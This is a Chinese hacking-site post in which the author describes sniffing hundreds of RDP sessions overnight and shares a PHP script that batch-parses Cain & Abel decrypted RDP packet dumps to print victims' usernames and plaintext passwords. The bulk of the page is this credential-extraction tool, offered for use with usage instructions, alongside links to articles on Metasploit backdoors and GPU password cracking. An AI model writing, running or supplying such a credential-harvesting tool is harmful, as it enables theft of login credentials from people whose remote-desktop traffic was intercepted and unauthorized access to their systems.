热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

RDP包批量解析为用户名+密码的php脚本

发布时间:2013-01-28 21:35文章来源:网络文章作者:秩名 点击次数:
摘要:昨天晚上开始嗅探,好家伙好几百个包,网上搜了一下有一款工具叫Cain RDP Parser,好家伙,一个一个选,玩死人的。。。索性写了个PHP脚本来批量解析。凑合着用。 ? php //AuthorWdot //Site:http://wdot.cc //用法phpCainRdpParser.php/tmp/1.txt#单个文件...

昨天晚上开始嗅探,好家伙好几百个包,网上搜了一下有一款工具叫“Cain RDP Parser”,好家伙,一个一个选,玩死人的。。。索性写了个PHP脚本来批量解析。凑合着用。

RDP包批量解析为用户名+密码的php脚本
 
  1. <?php   
  2. //Author Wdot   
  3. //Site:http://wdot.cc   
  4. //用法 php CainRdpParser.php /tmp/1.txt #单个文件解析   
  5. //用法 php CainRdpParser.php /tmp/RDP/ #批量解析   
  6. error_reporting(E_ERROR);   
  7. if(is_dir($argv[1]))   
  8. {   
  9. foreach (scandir($argv[1]) as $key => $value) {   
  10. if($value!='.' && $value!='..')   
  11. {   
  12. rdpParser($argv[1].$value);   
  13. }   
  14. }   
  15. }elseif(is_file($argv[1]))   
  16. {   
  17. rdpParser($argv[1]);   
  18. }   
  19.  
  20. function rdpParser($filename){   
  21. $crlf = "\r\n";   
  22. if(!file_exists($filename)){   
  23. print "file \"$filename\" not exists...$crlf";   
  24. return;   
  25. }   
  26. $rdpH=fopen($filename,'r');   
  27. print "FILE:".basename($filename).$crlf;   
  28. fseek($rdpH,0);   
  29. while (!feof($rdpH)) {   
  30. $line=trim(fgets($rdpH));   
  31. if(preg_match("/\w+.address:.*?$/",$line,$m))   
  32. {   
  33. print $line.$crlf;   
  34. }   
  35. if(preg_match("/^\[Client decrypted packet\]/",$line,$m))   
  36. {   
  37. $packet='';   
  38. while (!empty($line)) {   
  39. $line=trim(fgets($rdpH));   
  40. $packet.=substr($line,5,48);   
  41. }   
  42. $packets=explode('0000000000',str_replace(' ', '', $packet));   
  43. $i=count($packets)-27;   
  44. $packets=explode('0000',$packets[$i]);   
  45. $times=0;   
  46. foreach ($packets as $key => $value) {   
  47. if(empty($value) || $times>=2)continue;   
  48. print (($times==0)?'username':'password').":\t".pack('H*',$value).$crlf;   
  49. $times++;   
  50.  
  51. }   
  52. break;   
  53. }   
  54. }   
  55. fclose($rdpH);   
  56. print "-------------------------------$crlf";   
  57. }   
  58. ?> 

 

标签分类:

上一篇:Metasploit之建立backdoor一二
下一篇:GPU破解的软件目前主流三种选择